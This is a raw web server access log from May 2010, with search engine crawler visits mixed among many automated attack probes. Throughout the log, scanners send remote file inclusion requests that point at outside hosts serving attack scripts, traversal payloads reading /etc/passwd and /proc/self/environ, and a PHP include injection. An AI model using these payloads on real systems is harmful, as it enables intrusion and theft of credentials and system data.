58.230.162.220 - - [15/May/2010:04:06:45 -0500] "GET ///?pagina=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 1004 "-""Mozilla/5.0"
58.230.162.220 - - [15/May/2010:04:06:45 -0500] "GET /logs/access_log.1263772800///?pagina=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
58.230.162.220 - - [15/May/2010:04:06:45 -0500] "GET /logs///?pagina=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 5644 "-""Mozilla/5.0"
58.230.162.220 - - [15/May/2010:04:06:51 -0500] "GET /logs/access_log.1263772800///?pagina=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
58.230.162.220 - - [15/May/2010:04:06:51 -0500] "GET ///?pagina=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 1004 "-""Mozilla/5.0"
58.230.162.220 - - [15/May/2010:04:06:51 -0500] "GET /logs/access_log.1265068800///?pagina=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
58.230.162.220 - - [15/May/2010:04:06:51 -0500] "GET /logs///?pagina=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 5644 "-""Mozilla/5.0"
58.230.162.220 - - [15/May/2010:04:06:55 -0500] "GET ///?pagina=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 1004 "-""Mozilla/5.0"
58.230.162.220 - - [15/May/2010:04:06:55 -0500] "GET /logs/access_log.1263772800///?pagina=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
58.230.162.220 - - [15/May/2010:04:06:55 -0500] "GET /logs/access_log.1265068800///?pagina=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
58.230.162.220 - - [15/May/2010:04:06:55 -0500] "GET /logs///?pagina=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 5644 "-""Mozilla/5.0"
87.250.255.243 - - [15/May/2010:04:07:11 -0500] "GET /logs/access_log.1171238400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
204.152.200.50 - - [15/May/2010:04:07:44 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
67.195.112.180 - - [15/May/2010:04:07:46 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [15/May/2010:04:07:46 -0500] "GET /logs/access_log.1193270400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
204.152.200.50 - - [15/May/2010:04:09:08 -0500] "GET /logs/access_log.1273017600/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
204.152.200.50 - - [15/May/2010:04:09:08 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
204.152.200.50 - - [15/May/2010:04:09:08 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
204.152.200.50 - - [15/May/2010:04:09:35 -0500] "GET /logs/access_log.1273190400/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
67.195.112.180 - - [15/May/2010:04:13:57 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
213.160.120.204 - - [15/May/2010:04:20:49 -0500] "GET /logs/access_log.1270857600/index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=%20com_mambatstaff../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
213.160.120.204 - - [15/May/2010:04:20:49 -0500] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=%20com_mambatstaff../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
213.160.120.204 - - [15/May/2010:04:20:49 -0500] "GET /logs/index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=%20com_mambatstaff../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
207.46.199.200 - - [15/May/2010:04:21:20 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [15/May/2010:04:23:58 -0500] "GET /logs/access_log.1224633600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
58.230.162.220 - - [15/May/2010:04:27:35 -0500] "GET /logs//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
58.230.162.220 - - [15/May/2010:04:27:35 -0500] "GET //public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
58.230.162.220 - - [15/May/2010:04:27:35 -0500] "GET /logs/access_log.1272844800%20%20//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
58.230.162.220 - - [15/May/2010:04:27:42 -0500] "GET /logs//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
58.230.162.220 - - [15/May/2010:04:27:42 -0500] "GET //public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
58.230.162.220 - - [15/May/2010:04:27:42 -0500] "GET /logs/access_log.1272844800%20%20//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
58.230.162.220 - - [15/May/2010:04:27:42 -0500] "GET /logs//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
58.230.162.220 - - [15/May/2010:04:27:42 -0500] "GET //public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
58.230.162.220 - - [15/May/2010:04:27:42 -0500] "GET /logs/access_log.1272844800%20%20//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
58.230.162.220 - - [15/May/2010:04:27:49 -0500] "GET //public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
58.230.162.220 - - [15/May/2010:04:27:49 -0500] "GET /logs/access_log.1272844800%20%20//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
58.230.162.220 - - [15/May/2010:04:27:49 -0500] "GET /logs//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
119.148.64.114 - - [15/May/2010:04:30:05 -0500] "GET /logs/access_log.1270857600/index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=%20com_mambatstaff../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
119.148.64.114 - - [15/May/2010:04:30:05 -0500] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=%20com_mambatstaff../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
119.148.64.114 - - [15/May/2010:04:30:06 -0500] "GET /logs/index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=%20com_mambatstaff../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
80.179.153.117 - - [15/May/2010:04:30:10 -0500] "GET /logs/access_log.1270857600/index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=%20com_mambatstaff../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
80.179.153.117 - - [15/May/2010:04:30:10 -0500] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=%20com_mambatstaff../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
80.179.153.117 - - [15/May/2010:04:30:11 -0500] "GET /logs/index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=%20com_mambatstaff../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
122.249.22.58 - - [15/May/2010:04:31:21 -0500] "GET /logs/access_log.1270857600/index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=%20com_mambatstaff../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
122.249.22.58 - - [15/May/2010:04:31:22 -0500] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=%20com_mambatstaff../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
122.249.22.58 - - [15/May/2010:04:31:22 -0500] "GET /logs/index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=%20com_mambatstaff../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
87.250.255.243 - - [15/May/2010:04:36:42 -0500] "GET /logs/access_log.1217808000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
85.119.152.183 - - [15/May/2010:04:38:05 -0500] "GET /logs/API_HOME_DIR=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 357 "-""libwww-perl/5.803"
85.119.152.183 - - [15/May/2010:04:38:05 -0500] "GET /API_HOME_DIR=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 352 "-""libwww-perl/5.803"
208.43.194.3 - - [15/May/2010:04:44:49 -0500] "GET /logs/access_log.1272844800%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
208.43.194.3 - - [15/May/2010:04:44:49 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
208.43.194.3 - - [15/May/2010:04:44:49 -0500] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
208.43.194.3 - - [15/May/2010:04:47:40 -0500] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
208.43.194.3 - - [15/May/2010:04:47:40 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
208.43.194.3 - - [15/May/2010:04:47:40 -0500] "GET /logs/access_log.1272844800//components/com_cpg/cpg.php?mosConfig_absolute_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
87.250.255.243 - - [15/May/2010:04:48:00 -0500] "GET /logs/access_log.1240704000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [15/May/2010:04:53:03 -0500] "GET /logs/access_log.1215734400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [15/May/2010:04:53:13 -0500] "GET /logs/access_log.1228435200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.252.3.123 - - [15/May/2010:04:55:36 -0500] "GET //?installed_config_file=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 200 1003 "-""libwww-perl/5.808"
87.252.3.123 - - [15/May/2010:04:55:36 -0500] "GET /logs//?installed_config_file=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 200 5643 "-""libwww-perl/5.808"
174.133.201.194 - - [15/May/2010:05:00:29 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
174.133.201.194 - - [15/May/2010:05:00:29 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
174.133.201.194 - - [15/May/2010:05:00:29 -0500] "GET /logs/access_log.1273363200%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
174.133.201.194 - - [15/May/2010:05:02:45 -0500] "GET /logs/access_log.1273363200%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
174.133.201.194 - - [15/May/2010:05:02:45 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
174.133.201.194 - - [15/May/2010:05:02:46 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
87.252.3.123 - - [15/May/2010:05:04:58 -0500] "GET /htmlclass_path=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 330 "-""libwww-perl/5.808"
87.252.3.123 - - [15/May/2010:05:04:59 -0500] "GET /logs/htmlclass_path=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 335 "-""libwww-perl/5.808"
208.115.111.248 - - [15/May/2010:05:05:46 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
87.250.255.243 - - [15/May/2010:05:05:56 -0500] "GET /logs/access_log.1251072000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
198.170.141.58 - - [15/May/2010:05:07:07 -0500] "GET /logs/index.php?option=com_pcchess&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
198.170.141.58 - - [15/May/2010:05:07:07 -0500] "GET /index.php?option=com_pcchess&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
207.46.199.195 - - [15/May/2010:05:11:03 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.252.3.123 - - [15/May/2010:05:11:29 -0500] "GET //purchase.php?jamroom[jm_dir]=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 297 "-""libwww-perl/5.808"
87.252.3.123 - - [15/May/2010:05:11:29 -0500] "GET /logs//purchase.php?jamroom[jm_dir]=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 302 "-""libwww-perl/5.808"
87.250.255.243 - - [15/May/2010:05:20:22 -0500] "GET /logs/access_log.1160611200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
147.202.16.15 - - [15/May/2010:05:23:01 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
174.133.201.194 - - [15/May/2010:05:24:08 -0500] "GET /logs/access_log.1273363200//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
67.195.112.180 - - [15/May/2010:05:24:31 -0500] "GET /costume/costume1.htm HTTP/1.0" 304 - "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.48.202.44 - - [15/May/2010:05:24:39 -0500] "GET //errors.php?error=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
218.48.202.44 - - [15/May/2010:05:24:40 -0500] "GET /logs//errors.php?error=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
65.55.37.203 - - [15/May/2010:05:25:04 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.37.203 - - [15/May/2010:05:25:45 -0500] "GET /artwork/furniture.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
92.241.190.214 - - [15/May/2010:05:25:59 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.shilohuccyorkpa.org/images/result.jpg?? HTTP/1.1" 404 314 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
92.241.190.214 - - [15/May/2010:05:25:59 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.shilohuccyorkpa.org/images/result.jpg?? HTTP/1.1" 404 309 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
92.241.190.214 - - [15/May/2010:05:25:59 -0500] "GET /logs/access_log.1273363200//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.shilohuccyorkpa.org/images/result.jpg?? HTTP/1.1" 404 336 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
92.241.190.214 - - [15/May/2010:05:27:17 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.shilohuccyorkpa.org/logs/id.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
92.241.190.214 - - [15/May/2010:05:27:17 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.shilohuccyorkpa.org/logs/id.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
92.241.190.214 - - [15/May/2010:05:27:17 -0500] "GET /logs/access_log.1273363200%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.shilohuccyorkpa.org/logs/id.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
147.202.16.15 - - [15/May/2010:05:27:26 -0500] "GET //index.php?option=com_rsgallery&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
147.202.16.15 - - [15/May/2010:05:31:34 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
147.202.16.15 - - [15/May/2010:05:31:34 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
147.202.16.15 - - [15/May/2010:05:31:35 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
111.89.128.186 - - [15/May/2010:05:33:18 -0500] "GET //index.php?DOCUMENT_ROOT=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
111.89.128.186 - - [15/May/2010:05:33:18 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
210.174.163.182 - - [15/May/2010:05:33:25 -0500] "GET /head.php?adresa=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 292 "-""libwww-perl/5.808"
210.174.163.182 - - [15/May/2010:05:33:25 -0500] "GET /logs/head.php?adresa=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 297 "-""libwww-perl/5.808"
147.202.16.15 - - [15/May/2010:05:34:31 -0500] "GET /logs/access_log.1273276800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
147.202.16.15 - - [15/May/2010:05:34:40 -0500] "GET /logs/access_log.1273190400//index.php?option=com_rsgallery&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
147.202.16.15 - - [15/May/2010:05:34:40 -0500] "GET //index.php?option=com_rsgallery&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
147.202.16.15 - - [15/May/2010:05:34:40 -0500] "GET /logs//index.php?option=com_rsgallery&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
87.250.255.243 - - [15/May/2010:05:34:46 -0500] "GET /logs/access_log.1216252800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
210.174.163.182 - - [15/May/2010:05:35:07 -0500] "GET //stats.inc.php?prefix=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.808"
210.174.163.182 - - [15/May/2010:05:35:08 -0500] "GET /logs//stats.inc.php?prefix=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 303 "-""libwww-perl/5.808"
69.94.137.93 - - [15/May/2010:05:35:36 -0500] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
69.94.137.93 - - [15/May/2010:05:35:36 -0500] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
69.94.137.93 - - [15/May/2010:05:35:36 -0500] "GET /logs/access_log.1263168000//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
69.94.137.93 - - [15/May/2010:05:35:55 -0500] "GET /logs/access_log.1263168000//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
69.94.137.93 - - [15/May/2010:05:35:55 -0500] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
69.94.137.93 - - [15/May/2010:05:35:55 -0500] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
111.89.128.186 - - [15/May/2010:05:36:19 -0500] "GET //png.php?include_path=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
111.89.128.186 - - [15/May/2010:05:36:19 -0500] "GET /logs//png.php?include_path=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
111.89.128.186 - - [15/May/2010:05:36:51 -0500] "GET //lib.module.php?mod_root=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
111.89.128.186 - - [15/May/2010:05:36:51 -0500] "GET /logs//lib.module.php?mod_root=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
111.89.128.186 - - [15/May/2010:05:38:49 -0500] "GET //booth.php?include_path=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
111.89.128.186 - - [15/May/2010:05:38:50 -0500] "GET /logs//booth.php?include_path=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
198.170.141.58 - - [15/May/2010:05:42:01 -0500] "GET /logs/index.php?option=com_joomlaradiov5&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
198.170.141.58 - - [15/May/2010:05:42:01 -0500] "GET /index.php?option=com_joomlaradiov5&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
92.241.190.214 - - [15/May/2010:05:42:04 -0500] "GET /logs/access_log.1273363200//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.shilohuccyorkpa.org/logs/id.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
208.115.111.248 - - [15/May/2010:05:42:40 -0500] "GET / HTTP/1.1" 200 1003 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [15/May/2010:05:42:42 -0500] "GET /?D=A HTTP/1.1" 200 1003 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [15/May/2010:05:42:44 -0500] "GET /?M=A HTTP/1.1" 200 1003 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [15/May/2010:05:42:47 -0500] "GET /?N=A HTTP/1.1" 200 1003 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [15/May/2010:05:42:49 -0500] "GET /logs/access_log.1219536000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [15/May/2010:05:42:51 -0500] "GET /logs/access_log.1221177600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
